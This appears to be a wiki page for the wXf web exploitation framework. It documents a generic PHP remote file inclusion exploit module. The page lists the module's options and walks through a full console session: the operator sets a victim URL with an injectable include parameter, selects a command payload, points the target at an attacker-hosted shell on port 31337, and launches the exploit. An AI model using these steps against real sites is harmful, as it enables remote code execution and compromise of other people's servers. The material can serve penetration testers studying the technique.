forked from forced-request/wXf
-
Notifications
You must be signed in to change notification settings - Fork 0
exploit rfi php generic
cktricky edited this page Jul 26, 2011
·
3 revisions
Ken Johnson (CKTRICKY)
COOKIE true Example: uniquecookie=cookievalue
PROXYA false Proxy IP Address
PROXYP false Proxy Port Number
RURL http://www.example.com/test.php true Target address
THROTTLE 0 false Specify a number, after x requests we pause
RURL -- This will actually contain your victim URL and the RFI string.
COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:
SINGLE COOKIE
set COOKIES ASPSESSIONID=1234;
MULTI COOKIE
set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;
My IP is 192.168.1.120
and I'd like to host a shell on port 31337
. Additionally, I have an RFI string that is /index.php?some_auto_config_load=
. The victim path to index.php is http://www.victim.com/mysite
.
This is how you'd set your options:
wXf //> use exploit/rfi/php/generic
wXf exploit(generic)//> set RURL http://www.victim.com/mysite/index.php?some_auto_config_load=
-{+}- RURL => http://www.victim.com/mysite/index.php?some_auto_config_load=
wXf exploit(generic)//> set PAYLOAD payload/rfi/php/cmd_single
-{+}- PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(generic)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(generic)//> exploit